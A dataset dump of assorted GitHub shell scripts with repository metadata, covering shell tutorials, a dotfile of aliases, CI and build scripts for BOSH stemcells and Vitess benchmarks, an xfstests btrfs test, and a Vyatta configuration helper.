f34a2acc26cc5b78ad0b8f20c32ac4b13aea557f
|
Shell
|
harper-yang/shell-sample
|
/scripts/第一章之小试牛刀/c.sh
|
UTF-8
| 190 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
declare -A fruit
# 定义数组
fruit=([apple]='111' [orange]='222')
# 获取数组中的值
echo "apple price = ${fruit[apple]}"
# 获取数组中的key
echo "${!fruit[*]}"
| true |
4e08ce8ae60b9ba782ba71df6a66d661597d8061
|
Shell
|
Infinity-James/.dots
|
/.zprofile
|
UTF-8
| 1,324 | 2.75 | 3 |
[] |
no_license
|
# my werid aliases
alias cat="ccat --bg=dark"
alias reddy="redis-server /usr/local/etc/redis.conf"
alias vim="nvim"
alias watchtest="clear && fswatch -o test build | xargs -n1 -I{} npm test"
alias mong="mongod --config /usr/local/etc/mongod.conf"
alias rimraf="rm -rf"
alias ag="ag --color-path \"1;34\" --color-line-number \"3;34\""
alias pizza="node ~/pizza/web_client/getStatus.js"
alias maan="man"
alias maaan="man"
alias maaaan="man"
alias maaaaan="man"
alias maaaaaan="man"
# 3rd party functions
eval $(thefuck --alias)
[[ -s `brew --prefix`/etc/profile.d/z.sh ]] && . `brew --prefix`/etc/profile.d/z.sh
# node stuff
export NODE_REPL_HISTORY_FILE="/Users/will/node_repl.log"
export NVM_DIR="/Users/will/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && . "$NVM_DIR/nvm.sh" # This loads nvm
# ruby
source /usr/local/share/chruby/chruby.sh
chruby ruby-2.3
# my functions
mkky () {
if [ ! -z "$1" ]
then
mkdir "$1" && cd "$1"
fi
}
watchy () {
fswatch -0 $1 | xargs -0 -n 1 -I {} $2 {}
}
# fzf settings
export FZF_DEFAULT_COMMAND='ag -g ""'
# Git
alias g="git status"
alias gc="git commit -a"
alias gp="git push"
alias gpu="git push origin master"
alias gpl="git pull"
alias gpo="git pull origin master"
alias gl='git log --pretty=format:"[%h] %ae, %ar: %s" --stat'
alias gg='git log --pretty=oneline --graph --all'
| true |
bd26998e270e0e10d31430a2228b849e616952f8
|
Shell
|
cha63506/bosh-softlayer-tools
|
/ci/scripts/bosh-stemcell
|
UTF-8
| 1,224 | 3.109375 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
(
set -e
echo -e "\n Get stemcell version..."
STEMCELL_VERSION=`cat vsphere-stemcell/version`
STEMCELL_VERSION=0000
echo $STEMCELL_VERSION > stemcell-version
s3cmd put stemcell-version s3://bosh-softlayer-cpi-stemcells --access_key=$S3_ACCESS_KEY --secret_key=$S3_SECRET_KEY
echo -e "\n Install vagrant plugins..."
vagrant plugin install vagrant-berkshelf
vagrant plugin install vagrant-omnibus
vagrant plugin install vagrant-aws --plugin-version 0.5.0
echo -e "\n Navigate to vagrant directory..."
cd bosh/bosh-stemcell
echo -e "\n Copy s3cfg to vagrant shared directory..."
cp ../../bosh-softlayer-private/.s3cfg .
echo -e "\n Bring up vagrant stemcell building VM for AWS EC2-Classic..."
vagrant up remote --provider=aws
echo -e "\n Build stemcell, then upload to S3 bucket..."
vagrant ssh -c "
cd /bosh
bundle exec rake stemcell:build[vsphere,esxi,ubuntu,trusty,go,bosh-os-images,bosh-ubuntu-trusty-os-image.tgz]
s3cmd put /bosh/tmp/*.tgz s3://bosh-softlayer-cpi-stemcells -c /vagrant/.s3cfg
" remote
echo -e "\n Terminating VM"
ec2-describe-instances --filter "key-name=bosh" | grep instance | awk '{print $3}' | xargs ec2-terminate-instances
)
| true |
95dbf7ec65913d17b597a6cce1a0cd4b80cb3791
|
Shell
|
UniversitatBarcelonaMathInfo/SOI
|
/2p/je/1ej.sh
|
UTF-8
| 443 | 3.453125 | 3 |
[] |
no_license
|
#!/bin/bash
rm -fr practica2
mkdir practica2
# entrem a la practica 2
cd practica2
# creem els 5 directoris demanats
for i in {1..5}
do
mkdir dir_$i
done
# crear 10 directoris dins de dir_1
for i in {1..10}
do
mkdir dir_1/carpeta_$i
done
echo "f" > foo1.txt
echo "f" > foo2.txt
echo "f" > foo.c
echo "f" > README
cp *.txt dir_2
cp foo* dir_3
for i in $(ls)
do
if [ -d $i ];
then
echo "D- $i"
ls $i
else
echo "A- $i"
fi
done
| true |
7893b851c859fff443f295820330389fc864b9e7
|
Shell
|
pv2k/DWDM_Project
|
/Code/cde.sh
|
UTF-8
| 324 | 3.296875 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
c="_text"
i="PAKDD-3year"
j="./Text/"
echo "Opening pdf folder: " $i
echo "pdf_text folder:Text"
mkdir -p Text
for k in ./$i/*.pdf
do
pdfname="$(echo $k | rev | cut -d "/" -f 1 | rev)"
echo $j$pdfname$c
python pdf2txt.py -o "$j$pdfname$c" -t text "$k"
echo "Converting :" $pdfname
done
| true |
4d3da8fee948c18fcfe53fb408663b9065888dfb
|
Shell
|
mvtthxw/Bash_cwiczenia
|
/Tablice.sh
|
UTF-8
| 1,441 | 3.71875 | 4 |
[] |
no_license
|
#!/bin/bash
#Zadanie 1
#sortowanie przez podstawianie
function zad1(){
tablica=("$@")
n=${#tablica[*]}
for (( i=1;i<$n;i++)); do
j=$i-1
tymczasowe=${tablica[$i]}
while (( $j>=0 && $(echo "${tablica[j]} > ${tymczasowe}" |bc -l) )); do
tablica[$j+1]=${tablica[$j]}
j=$j-1
done
tablica[j+1]=${tymczasowe}
done
echo ${tablica[*]}
}
a=(5 3 2 4 8 1)
zad1 5.6 3 2.4 2.3 4 8 1
#zad1 "${a[@]}"
#Zadanie 2
#dwuwymiarowa tablica uzupelniona losowymi liczbami
function zad2(){
#wiersze $1
#kolumny $2
sprawdz='^[0-9]+$'
declare -A tablica
if ! [[ $1 =~ $sprawdz ]];then
echo "zle podana liczba kolumn lub wierszy"
exit -1
elif [[ $1 -le 0 && $2 -le 0 ]]; then
echo "zle podana liczba kolumn lub wierszy"
exit -1
else
for (( i=1; i<=$1; i++ )); do
for (( j=1; j<=$2; j++ )); do
liczba=${RANDOM}
tablica[$i,$j]=$(( $liczba%21 ))
done
done
fi
echo "tablica:"
for (( i=1; i<=$1; i++ )); do
for (( j=1; j<=$2; j++ )); do
printf ${tablica[$i,$j]}
printf " "
done
echo
done
}
zad2 $1 $2
function zad3(){
tablica=("$@")
n=${#tablica[*]}
for ((i = 0; i<n; i++)); do
for((j = i; j<n-i-1; j++)); do
if (( $(echo "${tablica[j]} > ${tablica[$j+1]}" |bc -l) )); then
# swap
tymczasowe=${tablica[$j]}
tablica[$j]=${tablica[$j+1]}
tablica[$j+1]=$tymczasowe
fi
done
done
echo ${tablica[*]}
}
zad3 4.5 3.2 5.6
| true |
02610f2d14e612fa94746b6d6d710e9547e31cb1
|
Shell
|
lavabit/robox
|
/res/scripts/delete.sh
|
UTF-8
| 2,429 | 3.46875 | 3 |
[] |
no_license
|
#!/bin/bash
# Handle self referencing, sourcing etc.
if [[ $0 != $BASH_SOURCE ]]; then
export CMD=$BASH_SOURCE
else
export CMD=$0
fi
# Ensure a consistent working directory so relative paths work.
pushd `dirname $CMD` > /dev/null
BASE=`pwd -P`
popd > /dev/null
ORG="$1"
NAME="$2"
PROVIDER="$3"
VERSION="$4"
if [ -f /opt/vagrant/embedded/bin/curl ]; then
export CURL="/opt/vagrant/embedded/bin/curl"
else
export CURL="curl"
fi
if [ -f /opt/vagrant/embedded/lib64/libssl.so ] && [ -z LD_PRELOAD ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libssl.so"
elif [ -f /opt/vagrant/embedded/lib64/libssl.so ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libssl.so:$LD_PRELOAD"
fi
if [ -f /opt/vagrant/embedded/lib64/libcrypto.so ] && [ -z LD_PRELOAD ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libcrypto.so"
elif [ -f /opt/vagrant/embedded/lib64/libcrypto.so ]; then
export LD_PRELOAD="/opt/vagrant/embedded/lib64/libcrypto.so:$LD_PRELOAD"
fi
export LD_LIBRARY_PATH="/opt/vagrant/embedded/bin/lib/:/opt/vagrant/embedded/lib64/"
# The jq tool is needed to parse JSON responses.
if [ ! -f /usr/bin/jq ]; then
tput setaf 1; printf "\n\nThe 'jq' utility is not installed.\n\n\n"; tput sgr0
exit 1
fi
# Ensure the credentials file is available.
if [ -f $BASE/../../.credentialsrc ]; then
source $BASE/../../.credentialsrc
else
tput setaf 1; printf "\nError. The credentials file is missing.\n\n"; tput sgr0
exit 2
fi
if [ -z ${VAGRANT_CLOUD_TOKEN} ]; then
tput setaf 1; printf "\nError. The vagrant cloud token is missing. Add it to the credentials file.\n\n"; tput sgr0
exit 2
fi
printf "\n\n"
# Assume the position, while you create the version.
#${CURL} \
# --tlsv1.2 \
# --silent \
# --retry 16 \
# --retry-delay 60 \
# --header "Content-Type: application/json" \
# --header "Authorization: Bearer $VAGRANT_CLOUD_TOKEN" \
# "https://app.vagrantup.com/api/v1/box/$ORG/$NAME/versions" \
# --data "
# {
# \"version\": {
# \"version\": \"$VERSION\",
# \"description\": \"A build environment for use in cross platform development.\"
# }
# }
# "
#printf "\n\n"
# Delete the existing provider, if it exists already.
${CURL} \
--silent \
--retry 16 \
--retry-delay 60 \
--header "Authorization: Bearer $VAGRANT_CLOUD_TOKEN" \
--request DELETE \
https://app.vagrantup.com/api/v1/box/$ORG/$NAME/version/$VERSION
printf "\n\n"
| true |
710eabdb3dd28d3d658ab781c003920e27c6b617
|
Shell
|
993639542/shell
|
/ip.sh
|
UTF-8
| 422 | 2.796875 | 3 |
[] |
no_license
|
#!/bin/bash
#随机生成网卡配置文件
for i in `seq 10`
do
num=$[RANDOM%127+128]
cat > /home/ens$i <<EOF
TYPE=Ethernet
PROXY_METHOD=none
ROWSER_ONLY=no
OOTPROTO=static
EFROUTE=yes
PV4_FAILURE_FATAL=no
PV6INIT=yes
PV6_AUTOCONF=yes
PV6_DEFROUTE=yes
PV6_FAILURE_FATAL=no
PV6_ADDR_GEN_MODE=stable-privacy
NAME=ens$i
EVICE=ens$i
NBOOT=yes
PADDR=192.168.75.$num
REFIX=24
ATEWAY=192.168.75.2
NS1=192.168.75.2
EOF
done
| true |
b8a5682c8fb71f5dbc531954495727d463e8d2e7
|
Shell
|
Quantum-Platinum-Cloud/YCSB
|
/vitess/scripts/benchmark-all-clusters.sh
|
UTF-8
| 3,738 | 4 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This script loops through the cluster configurations specified in
# clusters.json, bringing up the cluster as defined and then running
# all the YCSB benchmarks against it, and then pulls the results.
# ensure google cloud project is set
project_id=`gcloud config list project | sed -n 2p | cut -d " " -f 3`
if [ -z $project_id ]
then
echo Project ID not set, use 'gcloud config set project PROJECT' to set it
exit -1
fi
GKE_ZONE=${GKE_ZONE:-'us-east1-a'} # zone for ycsb-runners, gke cluster
BENCHMARKS_BASE_DIR=${BENCHMARKS_BASE_DIR:-~/ycsb_benchmarks} # where to save results
CLUSTERS_CONFIG=${CLUSTERS_CONFIG:-'cluster-replicas.json'}
WORKLOAD_CONFIG=${WORKLOAD_CONFIG:-'workloads-replicas.json'}
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME:-'ycsb-runner'}
SKIP_CLUSTER=${SKIP_CLUSTER:-'false'}
function json_to_params() {
json=$1
json=`echo $json | perl -pe "s/(,)(?=(?:[^']|'[^']*')*$)/;/g"` # Replace non quoted , with ;
json=`echo $json | perl -pe "s/: /:/g"` # Remove extra whitespace
json=`echo "${json:1:-1}"` # Get rid of open/close brackets
params=''
for i in `echo $json | tr ";" " "`; do
param_name=`echo $i | cut -f1 -d ':'`
val=`echo $i | cut -f2 -d ':'`
params="$params ${param_name:2:-1}=${val:2:-1}"
done
echo $params
}
git clone https://github.com/youtube/vitess.git
gke_config=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['gke_cluster']"`
gke_params=`json_to_params "$gke_config"`
if ! $SKIP_CLUSTER; then
echo Bringing up k8s cluster
cd vitess/examples/kubernetes
eval $gke_params GKE_ZONE=$GKE_ZONE ./cluster-up.sh 2>&1 | tee cluster-up.txt
cd ../../..
echo k8s cluster is up
fi
num_scenarios=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print len(obj['scenarios'])"`
max_ycsb_runners=0
for i in `seq 0 $(($num_scenarios-1))`; do
num_ycsb_runners=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['NUM_YCSB_RUNNERS']"`
max_ycsb_runners=$(($num_ycsb_runners > $max_ycsb_runners ? $num_ycsb_runners : $max_ycsb_runners))
done
echo Bringing up $max_ycsb_runners YCSB instances
# Bring up YCSB runners and reuse them for all cluster configurations
for i in `seq 1 $max_ycsb_runners`; do
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME}$i GKE_ZONE=$GKE_ZONE ./ycsb-runner-up.sh &
done
wait
echo YCSB instances are up
for i in `seq 0 $(($num_scenarios-1))`; do
# Convert json line format into environment variable line format
# e.g. {u'TABLETS_PER_SHARD': u'3', u'SHARDS': u'-80,80-'} becomes
# TABLETS_PER_SHARD=3 SHARDS=-80,80-
config=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['cluster']"`
params=`json_to_params "$config"`
num_ycsb_runners=`python -c "import json;obj=json.load(open('$CLUSTERS_CONFIG'));print obj['scenarios'][$i]['NUM_YCSB_RUNNERS']"`
benchmarks_dir=`date +"$BENCHMARKS_BASE_DIR/%Y_%m_%d_%H_%M"`
mkdir -p $benchmarks_dir
# Bring up the cluster
cd vitess/examples/kubernetes
cp cluster-up.txt $benchmarks_dir/cluster-up.txt
eval $params GKE_ZONE=$GKE_ZONE ./vitess-up.sh 2>&1 | tee $benchmarks_dir/vitess-up.txt
cd ../../..
WORKLOAD_CONFIG=$WORKLOAD_CONFIG BENCHMARKS_DIR=$benchmarks_dir GKE_ZONE=$GKE_ZONE NUM_YCSB_RUNNERS=$num_ycsb_runners ./run-all-benchmarks.sh
# Cleanup - tear down the cluster
cd vitess/examples/kubernetes
eval $params GKE_ZONE=$GKE_ZONE ./vitess-down.sh 2>&1 | tee $benchmarks_dir/vitess-down.txt
cd ../../..
done
cd vitess/examples/kubernetes
eval $gke_params ./cluster-down.sh
cd ../../..
rm -rf vitess
for i in `seq 1 $max_ycsb_runners`; do
YCSB_RUNNER_NAME=${YCSB_RUNNER_NAME}$i GKE_ZONE=$GKE_ZONE ./ycsb-runner-down.sh &
done
wait
| true |
96fbaa75f31c317c6ab587334b56b144a7170015
|
Shell
|
kdave/xfstests
|
/tests/btrfs/246
|
UTF-8
| 1,361 | 3.21875 | 3 |
[] |
no_license
|
#! /bin/bash
# SPDX-License-Identifier: GPL-2.0
# Copyright (c) 2021 SUSE Linux Products GmbH. All Rights Reserved.
#
# FS QA Test 246
#
# Make sure btrfs can create compressed inline extents
#
. ./common/preamble
_begin_fstest auto quick compress
# Override the default cleanup function.
_cleanup()
{
cd /
rm -r -f $tmp.*
}
# Import common functions.
. ./common/filter
# real QA test starts here
_supported_fs btrfs
_require_scratch
# If it's subpage case, we don't support inline extents creation for now.
_require_btrfs_inline_extents_creation
_scratch_mkfs > /dev/null
_scratch_mount -o compress,max_inline=2048
# This should create compressed inline extent
$XFS_IO_PROG -f -c "pwrite 0 2048" $SCRATCH_MNT/foobar > /dev/null
ino=$(stat -c %i $SCRATCH_MNT/foobar)
echo "sha256sum before mount cycle"
sha256sum $SCRATCH_MNT/foobar | _filter_scratch
_scratch_cycle_mount
echo "sha256sum after mount cycle"
sha256sum $SCRATCH_MNT/foobar | _filter_scratch
_scratch_unmount
$BTRFS_UTIL_PROG inspect dump-tree -t 5 $SCRATCH_DEV | \
grep "($ino EXTENT_DATA 0" -A2 > $tmp.dump-tree
echo "dump tree result for ino $ino:" >> $seqres.full
cat $tmp.dump-tree >> $seqres.full
grep -q "inline extent" $tmp.dump-tree || echo "no inline extent found"
grep -q "compression 1" $tmp.dump-tree || echo "no compressed extent found"
# success, all done
status=0
exit
| true |
2e44941e5238ac239a219698e2dfbe8fd9fcdbaf
|
Shell
|
warlockza/IBM-Data-Merge-Utility
|
/build/build.sh
|
UTF-8
| 1,381 | 3.296875 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# only run when executed from inside /build dir
if [ -f sample-context.xml ]; then
set -evx
PROJECT_BASE_DIR=$(cd ..; pwd)
# clean generated static sources
rm -rf "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/*
# enter static sources project root
cd "$PROJECT_BASE_DIR"/idmu-editor/src/main/node
# remove the build dir
rm -rf build
# build the static sources
#npm install
#bower install
#gulp fonts-copy-init
#gulp
# copy generated static sources to the path to have them included as part of the webapp at /editor
mkdir -p "$PROJECT_BASE_DIR/idmu-editor/src/main/resources/META-INF/resources/editor"
#cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/build/* "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/bower_components "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
cp -R "$PROJECT_BASE_DIR"/idmu-editor/src/main/node/src "$PROJECT_BASE_DIR"/idmu-editor/src/main/resources/META-INF/resources/editor/
# build maven ignoring tests
cd "$PROJECT_BASE_DIR"
mvn -DskipTests clean install
cd "$PROJECT_BASE_DIR"/build
else
echo "Need to run from inside the build dir at <idmu_project_dir>/build : "
echo "./build.sh"
fi
| true |
adec1571811aabc78b758db3556038fcafb45ff8
|
Shell
|
zfruc/smr-simulator
|
/src/private_test.sh
|
UTF-8
| 1,967 | 2.859375 | 3 |
[] |
no_license
|
#!/bin/bash
set -xue
nine=(5582 11164 16746 22328 27910 33492 39074 44656 50238)
one=(5582)
total_ssd=56863
total_fifo=10718
echo "8:16 2048000" > /sys/fs/cgroup/blkio/fo1/blkio.throttle.read_bps_device
echo "8:16 2048000" > /sys/fs/cgroup/blkio/fo1/blkio.throttle.write_bps_device
echo "8:16 10240000" > /sys/fs/cgroup/blkio/fo2/blkio.throttle.read_bps_device
echo "8:16 10240000" > /sys/fs/cgroup/blkio/fo2/blkio.throttle.write_bps_device
rm -rf /dev/shm/*
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 0 0 0 $total_ssd $total_fifo 0 0 > part31_user0_global.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo 0 0 > part31_user1_global.txt &
wait
for i in "${!nine[@]}"
do
rm -rf /dev/shm/*
first_cache_num=$[$total_ssd*i/10]
second_cache_num=$[total_ssd-$first_cache_num]
echo $i,$first_cache_num,$second_cache_num
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 0 0 0 $total_ssd $total_fifo $first_cache_num 1 > part31_user0_test$i.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo $second_cache_num 1 > part31_user1_test$i.txt &
wait
done
total_ssd=55822
total_fifo=10485
rm -rf /dev/shm/*
first_cache_num=$[$total_ssd*i/10]
second_cache_num=$[total_ssd-$first_cache_num]
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 3 0 0 $total_ssd $total_fifo 0 0 > part32_user0_global.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo 0 0 > part32_user1_global.txt &
wait
for i in "${!nine[@]}"
do
rm -rf /dev/shm/*
first_cache_num=$[$total_ssd*i/10]
second_cache_num=$[total_ssd-$first_cache_num]
echo $i,$first_cache_num,$second_cache_num
cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 3 0 0 $total_ssd $total_fifo $first_cache_num 1 > part32_user0_test$i.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo $second_cache_num 1 > part32_user1_test$i.txt &
wait
done
| true |
5f936db08667837b9bf120230f91e3be2240decd
|
Shell
|
thoughtpalette/Tetra
|
/run-build.sh
|
UTF-8
| 419 | 3 | 3 |
[] |
no_license
|
#!/bin/bash
export DISPLAY=:10
Xvfb :10 -screen 0 1366x768x24 -ac &
PIDS[0]=$!
#google-chrome --remote-debugging-port=9222 &
#PIDS[1]=$!
node server &
PIDS[2]=$!
sleep 2
npm test
RESULT=$?
cat ./coverage/net/lcov.info | ./node_modules/codecov.io/bin/codecov.io.js
for i in "${PIDS[@]}"
do
if ! kill $i > /dev/null 2>&1; then
echo "SIGTERM fail on process $i" >&2
fi
done
exit $RESULT
echo ""
| true |
7013367071a3f5283419857ad31f6fd1f1e7f2a3
|
Shell
|
CEnnis91/edgeos-scripts
|
/lib/vyatta.sh
|
UTF-8
| 1,152 | 3.859375 | 4 |
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# vyatta.sh
__SELF_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]}")")"
# shellcheck disable=SC1090
. "${__SELF_DIR}/globals.sh"
if [[ "$DEBUG" == "1" ]]; then
CMD_WRAPPER="echo"
else
CMD_WRAPPER="/opt/vyatta/sbin/vyatta-cfg-cmd-wrapper"
if [[ ! -e "$CMD_WRAPPER" ]]; then
echo "ERROR: cannot find vyatta-cfg-cmd-wrapper"
exit 1
else
if [[ 'vyattacfg' != "$(id -ng)" ]]; then
exec sg vyattacfg -c "$0 $*"
fi
fi
fi
check_config() {
# shellcheck disable=SC2155
local key="$*"
# shellcheck disable=SC2086,SC2155
local exists="$(exec_config show $key)"
case $exists in
*is\ empty) return 1 ;;
*not\ valid) echo "$exists"; return 0 ;;
*) return $DEBUG ;;
esac
}
exec_config() {
# shellcheck disable=SC2155
local commands="$*"
"$CMD_WRAPPER" begin
while read -r command; do
if [[ -n "$command" && ! $command =~ ^[\ \t]*#.*$ ]]; then
# shellcheck disable=SC2086
eval "$CMD_WRAPPER" $command
fi
done < <(echo "$commands")
"$CMD_WRAPPER" end
}
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.